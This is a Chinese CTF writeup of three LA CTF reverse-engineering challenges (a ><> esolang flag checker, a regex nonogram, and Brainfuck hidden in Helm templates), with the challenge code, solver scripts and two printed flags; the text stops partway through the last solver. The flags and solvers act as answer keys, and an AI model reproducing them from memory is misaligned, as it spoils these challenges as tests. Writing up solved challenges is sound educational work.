2026-02-10

資安 CTF

LA CTF Writeup

TL;DR

這次與 ICEDTEA 的各位拿到 LACTF 第 9 名開心

以下是我有打的題目，大部分都是有依靠 AI 如果我理解有錯歡迎私我指正感謝
DC: tbk_lteaar
~~LLM 真的好強~~

Reverse

the-fish

Solver: LemonTea

sorce:

import sys
import time
import random
from collections import defaultdict

NCHARS = "0123456789abcdef"
ARITHMETIC = "+-*%"
COMPARISON = { "=": "==", "(": "<", ")": ">" }
DIRECTIONS = { ">": (1,0), "<": (-1,0), "v": (0,1), "^": (0,-1) }
MIRRORS = { 
    "/": lambda x,y: (-y, -x),
    "\\": lambda x,y: (y, x),
    "|": lambda x,y: (-x, y),
    "_": lambda x,y: (x, -y),
    "#": lambda x,y: (-x, -y)
}


class _Getch:
    """

    Provide cross-platform getch functionality. Shamelessly stolen from 
    http://code.activestate.com/recipes/134892/

    """
    def __init__(self):
        try:
            self._impl = _GetchWindows()
        except ImportError:
            self._impl = _GetchUnix()

    def __call__(self): return self._impl()


class _GetchUnix:
    def __init__(self):
        import tty, sys

    def __call__(self):
        import sys, tty, termios
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        try:
            tty.setraw(sys.stdin.fileno())
            ch = sys.stdin.read(1)
        finally:
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        return ch


class _GetchWindows:
    def __init__(self):
        import msvcrt

    def __call__(self):
        import msvcrt
        return msvcrt.getch()
getch = _Getch()


def read_character():
    """Read one character from stdin. Returns -1 when no input is available."""
    if sys.stdin.isatty():
        # we're in console, read a character from the user
        char = getch() 
        # check for ctrl-c (break)
        if ord(char) == 3:
            sys.stdout.write("^C")
            sys.stdout.flush()
            raise KeyboardInterrupt
        else: return char
    else:
        # input is redirected using pipes
        char = sys.stdin.read(1)
        # return -1 if there is no more input available
        return char if char != "" else -1


class Interpreter:
    def __init__(self, code):
        """
        Initialize a new interpreter.

        Arguments:
            code -- the code to execute as a string
        """
        # check for hashbang in first line
        lines = code.split("\n")
        if lines[0][:2] == "#!":
            code = "\n".join(lines[1:])
        
        # construct a 2D defaultdict to contain the code
        self._codebox = defaultdict(lambda: defaultdict(int))
        line_n = char_n = 0
        for char in code:
            if char != "\n":
                self._codebox[line_n][char_n] = 0 if char == " " else ord(char)
                char_n += 1
            else:
                char_n = 0
                line_n += 1
        

        self._position = [-1,0]
        self._direction = DIRECTIONS[">"]
        
        # the register is initially empty
        self._register_stack = [None]
        # string mode is initially disabled
        self._string_mode = None
        # have we encountered a skip instruction?
        self._skip = False
        
        self._stack = []
        self._stack_stack = [self._stack]

        # is the last outputted character a newline?
        self._newline = None
    
    def move(self):
        """
        Move one step in the execution process, and handle the instruction (if
        any) at the new position.
        """
        # move one step in the current direction
        self._position[0] += self._direction[0]
        self._position[1] += self._direction[1]

        # wrap around if we reach the borders of the codebox
        if self._position[1] > max(self._codebox.keys()):
            # if the current position is beyond the number of lines, wrap to
            # the top
            self._position[1] = 0
        elif self._position[1] < 0:
            # if we're above the top, move to the bottom
            self._position[1] = max(self._codebox.keys())
        
        if self._direction[0] == 1 and self._position[0] > max(self._codebox[self._position[1]].keys()):
            # wrap to the beginning if we are beyond the last character on a 
            # line and moving rightwards
            self._position[0] = 0;
        elif self._position[0] < 0:
            # also wrap if we reach the left hand side
            self._position[0] = max(self._codebox[self._position[1]].keys())
        
        # execute the instruction found
        if not self._skip:
            instruction = int(self._codebox[self._position[1]][self._position[0]])
            # the current position might not be a valid character
            try:
                # use space if current cell is 0
                instruction = chr(instruction) if instruction > 0 else " "
            except:
                instruction = None
            try:
                self._handle_instruction(instruction)
            except StopExecution:
                raise
            except KeyboardInterrupt:
                # avoid catching as error
                raise KeyboardInterrupt
            except Exception as e:
                raise StopExecution("something smells fishy...")
            return instruction
        
        self._skip = False
    
    def _handle_instruction(self, instruction):
        """
        Execute an instruction.
        """
        if instruction == None:
            # error on invalid characters
            raise Exception
        
        # handle string mode
        if self._string_mode != None and self._string_mode != instruction:
            self._push(ord(instruction))
            return
        elif self._string_mode == instruction:
            self._string_mode = None
            return
        
        # instruction is one of ^v><, change direction
        if instruction in DIRECTIONS:
            self._direction = DIRECTIONS[instruction]

        # direction is a mirror, get new direction
        elif instruction in MIRRORS:
            self._direction = MIRRORS[instruction](*self._direction)
        
        # pick a random direction
        elif instruction == "x":
            self._direction = random.choice(list(DIRECTIONS.items()))[1]
        
        # portal; move IP to coordinates
        elif instruction == ".":
            y, x = self._pop(), self._pop()
            # IP cannot reach negative codebox
            if x < 0 or y < 0:
                raise Exception
            self._position = [x,y]
        
        # instruction is 0-9a-f, push corresponding hex value
        elif instruction in NCHARS:
            self._push(int(instruction, len(NCHARS)))
        
        # instruction is an arithmetic operator
        elif instruction in ARITHMETIC:
            a, b = self._pop(), self._pop()
            exec("self._push(b{}a)".format(instruction))
        
        # division
        elif instruction == ",":
            a, b = self._pop(), self._pop()
            self._push(b//a)
        
        # comparison operators
        elif instruction in COMPARISON:
            a, b = self._pop(), self._pop()
            exec("self._push(1 if b{}a else 0)".format(COMPARISON[instruction]))

        # turn on string mode
        elif instruction in "'\"": # turn on string parsing
            self._string_mode = instruction

        # skip one command
        elif instruction == "!":
            self._skip = True
        
         # skip one command if popped value is 0
        elif instruction == "?":
            if not self._pop():
                self._skip = True

        # push length of stack
        elif instruction == "l":
            self._push(len(self._stack))
        
        # duplicate top of stack
        elif instruction == ":":
            self._push(self._stack[-1])

        # remove top of stack
        elif instruction == "~":
            self._pop()
        
        # swap top two values
        elif instruction == "$":
            a, b = self._pop(), self._pop()
            self._push(a)
            self._push(b)
        
        # swap top three values
        elif instruction == "@":
            a, b, c = self._pop(), self._pop(), self._pop()
            self._push(a)
            self._push(c)
            self._push(b)
        
        # put/get register
        elif instruction == "&":
            if self._register_stack[-1] == None:
                self._register_stack[-1] = self._pop()
            else:
                self._push(self._register_stack[-1])
                self._register_stack[-1] = None
        
        # reverse stack
        elif instruction == "r":
            self._stack.reverse()

        # right-shift stack
        elif instruction == "}":
            self._push(self._pop(), index=0)
        
        # left-shift stack
        elif instruction == "{":
            self._push(self._pop(index=0))
        
        # get value in codebox
        elif instruction == "g":
            x, y = self._pop(), self._pop()
            self._push(self._codebox[x][y])
        
        # set (put) value in codebox
        elif instruction == "p":
            x, y, z = self._pop(), self._pop(), self._pop()
            self._codebox[x][y] = z
        
        # pop and output as character
        elif instruction == "o":
            self._output(chr(int(self._pop())))
        
        # pop and output whether it is the fisherated flag
        elif instruction == "n":
            n = self._pop()
            if n == 996566347683429688961961964301023586804079510954147876054559647395459973491017596401595804524870382825132807985366740968983080828765835881807124832265927076916036640789039576345929756821059163439816195513160010797349073195590419779437823883987351911858848638715543148499560927646402894094060736432364692585851367946688748713386570173685483800217158511326927462877856683551550570195482724733002494766595319158951960049962201021071499099433062723722295346927562274516673373002429521459396451578444698733546474629616763677756873373867426542764435331574187942918914671163374771769499428478956051633984434410838284545788689925768605629646947266017951214152725326967051673704710610619169658404581055569343649552237459405389619878622595233883088117550243589990766295123312113223283666311520867475139053092710762637855713671921562262375388239616545168599659887895366565464743090393090917526710854631822434014024:
                self._output("><>? ><>! (Indeed, that is the flag!)")
            else:
                self._output("><>? ><>. (Sorry, that is not the flag.)")

        # get one character from input and push it
        elif instruction == "i":
            i = self._input()
            self._push(ord(i) if isinstance(i, str) else i)
        
        # pop x and create a new stack with x members moved from the old stack
        elif instruction == "[":
            count = int(self._pop())
            if count == 0:
                self._stack_stack[-1], new_stack = self._stack, []
            else:
                self._stack_stack[-1], new_stack = self._stack[:-count], self._stack[-count:]
            self._stack_stack.append(new_stack)
            self._stack = new_stack

            # create a new register for this stack
            self._register_stack.append(None)
        
        # remove current stack, moving its members to the previous stack. 
        # if this is the last stack, a new, empty stack is pushed
        elif instruction == "]":
            old_stack = self._stack_stack.pop()
            if not len(self._stack_stack):
                self._stack_stack.append([])
            else:
                self._stack_stack[-1] += old_stack
            self._stack = self._stack_stack[-1]
            
            # register is dropped
            self._register_stack.pop()
            if not len(self._register_stack):
                self._register_stack.append(None)
        
        # the end
        elif instruction == ";":
            raise StopExecution()
        
        # space is NOP
        elif instruction == " ":
            pass

        # invalid instruction
        else:
            raise Exception("Invalid instruction", instruction)
    
    def _push(self, value, index=None):
        """
        Push a value to the current stack.

        Keyword arguments:
            index -- the index to push/insert to. (default: end of stack)
        """
        self._stack.insert(len(self._stack) if index == None else index, value)
        
    def _pop(self, index=None):
        """
        Pop and return a value from the current stack.

        Keyword arguments:
            index -- the index to pop from (default: end of stack)
        """
        # don't care about exceptions - they are handled at a higher level
        value = self._stack.pop(len(self._stack)-1 if index == None else index)
        # convert to int where possible to avoid float overflow
        if value == int(value):
            value = int(value)
        return value

    def _input(self):
        """
        Return an inputted character.
        """
        return read_character()

    
    def _output(self, output):
        """
        Output a string without a newline appended.
        """
        output = str(output)
        self._newline = output.endswith("\n")
        sys.stdout.write(output)
        sys.stdout.flush()


class StopExecution(Exception):
    """
    Exception raised when a script has finished execution.
    """
    def __init__(self, message=None):
        self.message = message

if __name__ == "__main__":
    flag = input("><> ><>. (Enter the flag): ")

    fisherator = """r0!&4:*:**+&5:*0l2=?.~~20."W"01&:&1=}@{?.{2*"E"0&:&2%0=?.&3*1+&}}1+{{.&2,:&}@{1=?.{56*0.n;"""
    
    interpreter = Interpreter(fisherator)
    interpreter._stack = [int(ord(c)) for c in flag]

    # run the script
    try:
        while True:
            try:
                instr = interpreter.move()
            except StopExecution as stop:
                # only print a newline if the script didn't
                newline = ("\n" if (not interpreter._newline) and interpreter._newline != None else "")
                sys.stdout.write((newline+stop.message+"\n") if stop.message else newline)
                sys.exit()
    except KeyboardInterrupt:
        # exit cleanly
        sys.exit("\n")

這是一個自制的 esolang

Interpreter

class Interpreter:
    def __init__(self, code):
        """
        Initialize a new interpreter.

        Arguments:
            code -- the code to execute as a string
        """
        # check for hashbang in first line
        lines = code.split("\n")
        if lines[0][:2] == "#!":
            code = "\n".join(lines[1:])
        
        # construct a 2D defaultdict to contain the code
        self._codebox = defaultdict(lambda: defaultdict(int))
        line_n = char_n = 0
        for char in code:
            if char != "\n":
                self._codebox[line_n][char_n] = 0 if char == " " else ord(char)
                char_n += 1
            else:
                char_n = 0
                line_n += 1
        

        self._position = [-1,0]
        self._direction = DIRECTIONS[">"]
        
        # the register is initially empty
        self._register_stack = [None]
        # string mode is initially disabled
        self._string_mode = None
        # have we encountered a skip instruction?
        self._skip = False
        
        self._stack = []
        self._stack_stack = [self._stack]

        # is the last outputted character a newline?
        self._newline = None
    
    def move(self):
        """
        Move one step in the execution process, and handle the instruction (if
        any) at the new position.
        """
        # move one step in the current direction
        self._position[0] += self._direction[0]
        self._position[1] += self._direction[1]

        # wrap around if we reach the borders of the codebox
        if self._position[1] > max(self._codebox.keys()):
            # if the current position is beyond the number of lines, wrap to
            # the top
            self._position[1] = 0
        elif self._position[1] < 0:
            # if we're above the top, move to the bottom
            self._position[1] = max(self._codebox.keys())
        
        if self._direction[0] == 1 and self._position[0] > max(self._codebox[self._position[1]].keys()):
            # wrap to the beginning if we are beyond the last character on a 
            # line and moving rightwards
            self._position[0] = 0;
        elif self._position[0] < 0:
            # also wrap if we reach the left hand side
            self._position[0] = max(self._codebox[self._position[1]].keys())
        
        # execute the instruction found
        if not self._skip:
            instruction = int(self._codebox[self._position[1]][self._position[0]])
            # the current position might not be a valid character
            try:
                # use space if current cell is 0
                instruction = chr(instruction) if instruction > 0 else " "
            except:
                instruction = None
            try:
                self._handle_instruction(instruction)
            except StopExecution:
                raise
            except KeyboardInterrupt:
                # avoid catching as error
                raise KeyboardInterrupt
            except Exception as e:
                raise StopExecution("something smells fishy...")
            return instruction
        
        self._skip = False

這個自制的 esolang 的 Interpreter

他是個 2D 平面
- 有（x, y）位置
- 一開始在（-1, 0），方向往右
指令會：
- 照方向移動
- 碰到邊界就 wrap around

Stack-based + 多堆疊 + Register
它有：
self._stack：目前使用的 stack
self._stack_stack：stack 的 stack
self._register_stack：每個 stack 對應一個暫存器

特殊指令：

指令	功能
:	複製 stack top
$	交換 top 2
@	交換 top 3
{ }	stack 左 / 右 shift
[ ]	建立 / 合併子 stack
&	register put / get

數值：

0-9跟a-f: 推入 hex 值
+ - * % ,: 運算值

控制：

^ v < >: 改方向
/ \ | _ #: 鏡像反射
x: 隨機方向
! 跳過下一個指令
? pop 值為 0 才跳過

字串

' 或 ": 進入 string mode

I/O

o: pop -> 輸出字元
i: 讀一個輸入字元
n: 檢查 flag
;: 結束程式

好解釋完程式了

elif instruction == "n":
    n = self._pop()
    if n == 996566347683429688961961964301023586804079510954147876054559647395459973491017596401595804524870382825132807985366740968983080828765835881807124832265927076916036640789039576345929756821059163439816195513160010797349073195590419779437823883987351911858848638715543148499560927646402894094060736432364692585851367946688748713386570173685483800217158511326927462877856683551550570195482724733002494766595319158951960049962201021071499099433062723722295346927562274516673373002429521459396451578444698733546474629616763677756873373867426542764435331574187942918914671163374771769499428478956051633984434410838284545788689925768605629646947266017951214152725326967051673704710610619169658404581055569343649552237459405389619878622595233883088117550243589990766295123312113223283666311520867475139053092710762637855713671921562262375388239616545168599659887895366565464743090393090917526710854631822434014024:
        self._output("><>? ><>! (Indeed, that is the flag!)")
    else:
        self._output("><>? ><>. (Sorry, that is not the flag.)")

判讀 flag 的邏輯
他給了一個巨大整數
看 code 去理解整數怎麽產生的推回去就好
exploit.py

int_num = 996566347683429688961961964301023586804079510954147876054559647395459973491017596401595804524870382825132807985366740968983080828765835881807124832265927076916036640789039576345929756821059163439816195513160010797349073195590419779437823883987351911858848638715543148499560927646402894094060736432364692585851367946688748713386570173685483800217158511326927462877856683551550570195482724733002494766595319158951960049962201021071499099433062723722295346927562274516673373002429521459396451578444698733546474629616763677756873373867426542764435331574187942918914671163374771769499428478956051633984434410838284545788689925768605629646947266017951214152725326967051673704710610619169658404581055569343649552237459405389619878622595233883088117550243589990766295123312113223283666311520867475139053092710762637855713671921562262375388239616545168599659887895366565464743090393090917526710854631822434014024

bits = bin(int_num)[3:]

n = 1
for b in reversed(bits):
    if b == '0':
        n = n * 2
    else:
 
        assert (2*n - 1) % 3 == 0
        n = (2*n - 1) // 3

flag = n.to_bytes((n.bit_length() + 7) // 8, "big")
print(flag.decode())

Flag: lactf{7h3r3_m4y_83_50m3_155u35_w17h_7h15_1f_7h3_c011472_c0nj3c7ur3_15_d15pr0v3n}

flag-finder

Solver LemonTea

題目給了一個網頁進去

嗯看來沒什麼點開 F12
看來他給了一個 index.js

const fullInput = document.getElementById('fullInput');
const find = document.getElementById('find');
const result = document.getElementById('result');
const len = <SNIP><省略>.+#\.+#\.+#{3}\.+#\.+#\.+#{3}\.+#{3}\.+#\.+#{3}\.+#\.+#\.+#{3}\.+#{3}\.+#{3}\.+#\.+#\.+#\.+#{3}\.+#\.+#\.+#{3}\.+#{3}\.+#\.+#\.*)(?<=.{1616})(?<!.{1617})(\.*#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#{3}\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#\.+#{3}\.+#{2}\.*)(?<=.{1717})(?<!.{1718})(\.*#{3}\.+#\.+#\.+#{3}\.+#\.+#\.+#{3}\.+#{3}\.+#\.+#\.+#\.+#\.+#\.+#{3}\.+#\.+#{3}\.+#\.+#{3}\.+#{3}\.+#{3}\.+#\.+#\.+#{3}\.+#{3}\.+#\.+#\.+#\.+#\.+#\.+#{2}\.*)(?<=.{1818})(?<!.{1819})(\.*)(?<=.{1919})(?<!.{1920})$/; 
function createInput() {
    for (let i = 0; i < len; i++) {
        const checkbox = document.createElement('input');
        checkbox.type = 'checkbox';
        checkbox.id = `box-${i}`;
        checkbox.className = 'grid-box';
        fullInput.appendChild(checkbox);
    }
}
function match() {
    const boxes = document.querySelectorAll('.grid-box');
    let input = "";
    boxes.forEach(box => {
        input += box.checked ? "#" : ".";
    });
    result.className = 'status';
    if (theFlag.test(input)) {
        result.textContent = "✅ Flag found!";
        result.classList.add('success');
    } else {
        result.textContent = "❌ Flag not found.";
        result.classList.add('error');
    }
}
createInput();
find.addEventListener('click', match);

稍微看了一下
在這 index.js 有個爆炸長的 Regex(也就是Flag)
他的 box 是用 # 代表黑跟 . 代表白
那就寫個腳本去把圖畫出來就好

exploit.py

import re

ROWS = 19
COLS = 101

regex_text = open('index.js').read()
match = re.search(r'theFlag = /(.*?)/;', regex_text, re.DOTALL)
regex_str = match.group(1)

def parse_col_runs_final(col):
    """Parse hash runs for column col with all edge cases handled"""
    
    if col == 0:
        # Pattern: \..{100} for dot, #.{100} for hash
        all_dot = r'\(\?=\(\?:\\\.\.\{100\}\)\{19\}\)'
        star_pat = r'\(\?=\(\?:\\\.\.\{100\}\)\*'
        hash_pat = r'\(\?:#\.\{100\}\)(?:\{(\d+)\})?'
    elif col == 1:
        # Pattern: .\..{99} for dot, .#.{99} for hash (without {1})
        all_dot = r'\(\?=\(\?:\.\\\.\.\{99\}\)\{19\}\)'
        star_pat = r'\(\?=\(\?:\.\\\.\.\{99\}\)\*'
        hash_pat = r'\(\?:\.#\.\{99\}\)(?:\{(\d+)\})?'
    elif col == 99:
        # Pattern: .{99}\.. for dot, .{99}#. for hash
        all_dot = r'\(\?=\(\?:\.\{99\}\\\.\.\)\{19\}\)'
        star_pat = r'\(\?=\(\?:\.\{99\}\\\.\.\)\*'
        hash_pat = r'\(\?:\.\{99\}#\.\)(?:\{(\d+)\})?'
    elif col == 100:
        # Pattern: .{100}\. for dot, .{100}# for hash
        all_dot = r'\(\?=\(\?:\.\{100\}\\\.\)\{19\}\)'
        star_pat = r'\(\?=\(\?:\.\{100\}\\\.\)\*'
        hash_pat = r'\(\?:\.\{100\}#\)(?:\{(\d+)\})?'
    else:
        rest = 100 - col
        all_dot = rf'\(\?=\(\?:\.\{{{col}\}}\\\.\.\{{{rest}\}}\)\{{19\}}\)'
        star_pat = rf'\(\?=\(\?:\.\{{{col}\}}\\\.\.\{{{rest}\}}\)\*'
        hash_pat = rf'\(\?:\.\{{{col}\}}#\.\{{{rest}\}}\)(?:\{{(\d+)\}})?'
    
    if re.search(all_dot, regex_str):
        return []
    
    m = re.search(star_pat, regex_str)
    if not m:
        return []
    
    start = m.start()
    depth = 0
    end = start
    for i, c in enumerate(regex_str[start:]):
        if c == '(': depth += 1
        elif c == ')':
            depth -= 1
            if depth == 0:
                end = start + i + 1
                break
    
    block = regex_str[start:end]
    matches = re.findall(hash_pat, block)
    runs = [int(g) if g else 1 for g in matches]
    return runs

def parse_row_runs(row_num):
    start_pos = (row_num + 1) * COLS
    end_pos = start_pos + 1
    pattern = rf'\(\?<=\.\{{{start_pos}\}}\)\(\?<!\.\{{{end_pos}\}}\)\(([^)]+)\)'
    m = re.search(pattern, regex_str)
    if not m:
        return []
    block = m.group(1)
    if block == r'\.*':
        return []
    runs = []
    i = 0
    while i < len(block):
        if block[i:i+3] in (r'\.*', r'\.+'):
            i += 3
        elif block[i] == '#':
            i += 1
            if i < len(block) and block[i] == '{':
                j = block.index('}', i)
                runs.append(int(block[i+1:j]))
                i = j + 1
            else:
                runs.append(1)
        else:
            i += 1
    return runs

col_runs = [parse_col_runs_final(c) for c in range(COLS)]
row_runs = [parse_row_runs(r) for r in range(ROWS)]

col_total = sum(sum(r) for r in col_runs)
row_total = sum(sum(r) for r in row_runs)

from z3 import *

solver = Solver()

cells = [[Bool(f"c_{r}_{c}") for c in range(COLS)] for r in range(ROWS)]

def add_line_constraints(solver, vars, runs, line_id):
    n = len(vars)
    if not runs:
        for v in vars:
            solver.add(Not(v))
        return
    
    starts = [Int(f"s_{line_id}_{i}") for i in range(len(runs))]
    
    for i, (start, run_len) in enumerate(zip(starts, runs)):
        solver.add(start >= 0)
        solver.add(start + run_len <= n)
        if i > 0:
            solver.add(start >= starts[i-1] + runs[i-1] + 1)
    
    for pos in range(n):
        conds = [And(starts[i] <= pos, pos < starts[i] + runs[i]) for i in range(len(runs))]
        solver.add(vars[pos] == Or(conds))


for r in range(ROWS):
    add_line_constraints(solver, cells[r], row_runs[r], f"r{r}")

for c in range(COLS):
    col_cells = [cells[r][c] for r in range(ROWS)]
    add_line_constraints(solver, col_cells, col_runs[c], f"c{c}")

result = solver.check()

if result == sat:
    model = solver.model()
    grid = []
    for r in range(ROWS):
        line = ''.join('#' if is_true(model[cells[r][c]]) else '.' for c in range(COLS))
        grid.append(line)
        print(line)
    
    test_str = ''.join(grid)
    the_flag = re.compile(regex_str)
    for line in grid:
        print(line.replace('.', '  ').replace('#', '██'))

Flag: lactf{Wh47_d0_y0u_637_wh3n_y0u_cr055_4_r363x_4nd_4_n0n06r4m?_4_r363x06r4m!}

HELM-HELL

Solver: LemonTea

這題給了一個 .tpl file

{{- define "tideInlet200" -}}
{{- $sea := .sea -}}
{{- $helm := .helm -}}
{{- $cargo := .cargo -}}
{{- $provisions := .provisions -}}
{{- $logbook := .logbook -}}
{{- $gatewayData6832 := 9134 -}}
{{- $controllerStack6830 := printf "%d" $helm -}}
{{- $secretPool6829 := default 0 (index $sea $controllerStack6830) -}}
{{- $sailMap6833 := add $gatewayData6832 $helm -}}
{{- if ne $secretPool6829 0 -}}
{{- $helm = add $helm 1 -}}
{{- $revisionBuffer6796 := 5551 -}}
{{- $beaconSpeed6798 := default 3432 1743 -}}
{{- $tolerationConfig6800 := sub (mul 6894 8005) (add 6894 8005) -}}
{{- $resourceMeta6802 := default 473 39 -}}
{{- $berthSurge6795 := dict "sea" $sea "helm" $helm "cargo" $cargo "provisions" $provisions "logbook" $logbook -}}
{{- include "nauticalCurrent198" $berthSurge6795 -}}
{{- $sea = $berthSurge6795.sea -}}
{{- $helm = $berthSurge6795.helm -}}
{{- $cargo = $berthSurge6795.cargo -}}
{{- $logbook = $berthSurge6795.logbook -}}
{{- $serviceHeap6804 := printf "%d" 8928 -}}
{{- $kubeletStore6806 := add 8295 3298 -}}
{{- if gt 3597 2597 -}}{{- $cargoSea6808 := 3003 -}}{{- end -}}
{{- $helmDepth6810 := sub (add $helm 9089) 9089 -}}
{{- $helm = sub $helm (add 0 1) -}}
{{- $sailWay6821 := add 3014 3981 -}}
{{- $probeData6823 := len $sea -}}{{- $tideMile6824 := add $probeData6823 6673 -}}
{{- $sternSwell6825 := default 2812 9430 -}}
{{- $controllerStore6820 := dict "sea" $sea "helm" $helm "cargo" $cargo "provisions" $provisions "logbook" $logbook -}}
{{- include "leagueCurrent199" $controllerStore6820 -}}
{{- $sea = $controllerStore6820.sea -}}
{{- $helm = $controllerStore6820.helm -}}
{{- $cargo = $controllerStore6820.cargo -}}
{{- $logbook = $controllerStore6820.logbook -}}
{{- $endpointHeap6827 := sub (mul 4183 8433) (add 4183 8433) -}}
{{- $fleetMile6831 := dict "sea" $sea "helm" $helm "cargo" $cargo "provisions" $provisions "logbook" $logbook -}}
{{- include "tideInlet200" $fleetMile6831 -}}
{{- $_ := set . "sea" $fleetMile6831.sea -}}
{{- $_ := set . "helm" $fleetMile6831.helm -}}
{{- $_ := set . "cargo" $fleetMile6831.cargo -}}
{{- $_ := set . "logbook" $fleetMile6831.logbook -}}
{{- end -}}
{{- end -}}

以上是節錄
查看 _helpers.tpl，發現有大量 Helm 指令和 `$helm/$sea` 運算。
每個字符檢查流程大概是：
用 >NNNN[<MMMM>-]<> 設定 cell[0] = N * M
`,` 讀使用者輸入到 cell[1]
`<[->-<]>` 做 cell[1] -= cell[0]
`[>[-]<[-]]` 如果 mismatch 清 flag
BF 程式其實就是 每個字符都計算一個期望值。
觀察到每個 define 模板可以被 include，形成樹狀結構。

exploit.py

#!/usr/bin/env python3
"""
Extract the expected input characters from the BF program.
The BF program pattern is:
  >>+<<   (set match flag)
  For each char:
    >NNNNN[<MMMM>-]<>   (set cell[0] = N*M = expected char)
    ,                    (read input to cell[1])
    <[->-<]>             (subtract)
    [>[-]<[-]]           (if mismatch, clear flag)
  Final: check flag and output True/False

We need to extract the N*M values.
"""

import re
import sys

def parse_templates(filepath):
    with open(filepath, 'r') as f:
        content = f.read()
    
    lines = content.split('\n')
    templates = {}
    current_name = None
    current_lines = []
    depth = 0
    
    for line in lines:
        stripped = line.strip()
        define_match = re.search(r'\{\{-\s*define\s+"([^"]+)"\s*-\}\}', stripped)
        
        if define_match:
            if current_name:
                templates[current_name] = current_lines
            current_name = define_match.group(1)
            current_lines = []
            depth = 0
            continue
        
        if current_name is not None:
            has_if = bool(re.search(r'\{\{-\s*if\s', stripped))
            has_end = bool(re.search(r'\{\{-\s*end\s*-\}\}', stripped))
            
            if has_if and has_end and stripped.count('end') == 1:
                current_lines.append(stripped)
            elif has_end and not has_if:
                if depth == 0:
                    templates[current_name] = current_lines
                    current_name = None
                    current_lines = []
                else:
                    depth -= 1
                    current_lines.append(stripped)
            else:
                if has_if and not has_end:
                    depth += 1
                current_lines.append(stripped)
    
    if current_name:
        templates[current_name] = current_lines
    
    return templates


def classify_helm_op(line):
    patterns = [
        (r'\$helm\s*=\s*add\s+\$helm\s+(\d+)\s*-\}\}\s*$', lambda m: int(m.group(1))),
        (r'\$helm\s*=\s*sub\s+\$helm\s+(\d+)\s*-\}\}\s*$', lambda m: -int(m.group(1))),
        (r':=\s*(\d+)\s*-\}\}\{\{-\s*\$helm\s*=\s*add\s+\$helm', lambda m: int(m.group(1))),
        (r':=\s*(\d+)\s*-\}\}\{\{-\s*\$helm\s*=\s*sub\s+\$helm', lambda m: -int(m.group(1))),
        (r'ternary\s+1\s+0\s+true\s*-\}\}\{\{-\s*\$helm\s*=\s*add\s+\$helm', lambda m: 1),
        (r'ternary\s+1\s+0\s+true\s*-\}\}\{\{-\s*\$helm\s*=\s*sub\s+\$helm', lambda m: -1),
        (r'\$helm\s*=\s*add\s+\$helm\s+\(sub\s+(\d+)\s+(\d+)\)', lambda m: int(m.group(1)) - int(m.group(2))),
        (r'\$helm\s*=\s*sub\s+\(add\s+\$helm\s+(\d+)\)\s+(\d+)', lambda m: int(m.group(1)) - int(m.group(2))),
        (r'\$helm\s*=\s*add\s+\(sub\s+\$helm\s+(\d+)\)\s+(\d+)', lambda m: int(m.group(2)) - int(m.group(1))),
        (r'\$helm\s*=\s*sub\s+\$helm\s+\(add\s+(\d+)\s+(\d+)\)', lambda m: -(int(m.group(1)) + int(m.group(2)))),
    ]
    for pattern, handler in patterns:
        m = re.search(pattern, line)
        if m:
            return handler(m)
    return None


def get_set_sea_delta(body, i, line):
    """Get the memory delta from a set $sea operation."""
    # Pattern A: (mod (add (sub $OLD $VAR) 256) 256) -> -1
    if re.search(r'\(mod\s+\(add\s+\(sub\s+\$\w+\s+\$\w+\)\s+256\)\s+256\)', line):
        return -1
    
    # Pattern B: (mod (add (sub $OLD N) 256) 256) -> -N
    m = re.search(r'\(mod\s+\(add\s+\(sub\s+\$\w+\s+(\d+)\)\s+256\)\s+256\)', line)
    if m:
        return -int(m.group(1))
    
    # Pattern C: (mod (add $VAR 256) 256)
    m = re.search(r'\(mod\s+\(add\s+\$(\w+)\s+256\)\s+256\)', line)
    if m:
        var_name = m.group(1)
        sub_val = 0
        add_val = 0
        for j in range(max(0, i-5), i):
            sv = re.search(rf'\${var_name}\s*:=\s*sub\s+\$\w+\s+(\d+)', body[j])
            if sv:
                sub_val = int(sv.group(1))
            av = re.search(rf'\${var_name}\s*=\s*add\s+\${var_name}\s+(\d+)', body[j])
            if av:
                add_val = int(av.group(1))
        return -(sub_val - add_val)
    
    # Pattern D: (mod (add $OLD 1) 256)
    if re.search(r'\(mod\s+\(add\s+\$\w+\s+1\)\s+256\)', line):
        return 1
    
    # Pattern E: (mod (add $OLD $VAR) 256) -> +1
    if re.search(r'\(mod\s+\(add\s+\$\w+\s+\$\w+\)\s+256\)', line):
        return 1
    
    # Pattern F: (mod $VAR 256)
    m = re.search(r'\(mod\s+\$(\w+)\s+256\)', line)
    if m:
        var_name = m.group(1)
        add_val = 0
        sub_val = 0
        for j in range(max(0, i-5), i):
            am = re.search(rf'\${var_name}\s*:=\s*add\s+\$\w+\s+(\d+)', body[j])
            if am:
                add_val = int(am.group(1))
            sm = re.search(rf'\${var_name}\s*=\s*sub\s+\${var_name}\s+(\d+)', body[j])
            if sm:
                sub_val = int(sm.group(1))
        return add_val - sub_val
    
    return None


filepath = "/home/alvin/Documents/CTF/LACTF/helm hell/helm-hell/templates/_helpers.tpl"
templates = parse_templates(filepath)

# Run the BF extraction but track accumulation patterns
# The BF program structure for a char checker is:
# >PPPP[<QQQQ>-]<>  -> cell[0] = P*Q (the expected char)
# ,                   -> read input to cell[1]  
# <[->-<]>            -> cell[1] -= cell[0]
# [>[-]<[-]]          -> if cell[1]!=0, clear flag

# I can extract expected chars by simulating the BF just on the setup phase
# Let me trace operations from volumeWorker7940 and see what values are set before each comma

class Tracer:
    def __init__(self, templates):
        self.templates = templates
        self.ops = []  # List of (op, value) tuples
    
    def trace(self, name, depth=0):
        if name not in self.templates:
            return
        body = self.templates[name]
        is_loop = any(f'include "{name}"' in line for line in body)
        
        if is_loop:
            self.ops.append(('LOOP_START', name))
            self._trace_body(name, body, depth)
            self.ops.append(('LOOP_END', name))
        else:
            self._trace_body(name, body, depth)
    
    def _trace_body(self, self_name, body, depth):
        i = 0
        while i < len(body):
            line = body[i]
            
            if any(x in line for x in [':= .sea', ':= .helm', ':= .cargo', ':= .provisions', ':= .logbook']):
                i += 1
                continue
            
            helm_delta = classify_helm_op(line)
            if helm_delta is not None:
                self.ops.append(('MOVE', helm_delta))
                i += 1
                continue
            
            if 'set $sea' in line and 'mod' in line:
                delta = get_set_sea_delta(body, i, line)
                if delta is not None:
                    if delta > 0:
                        self.ops.append(('INC', delta))
                    elif delta < 0:
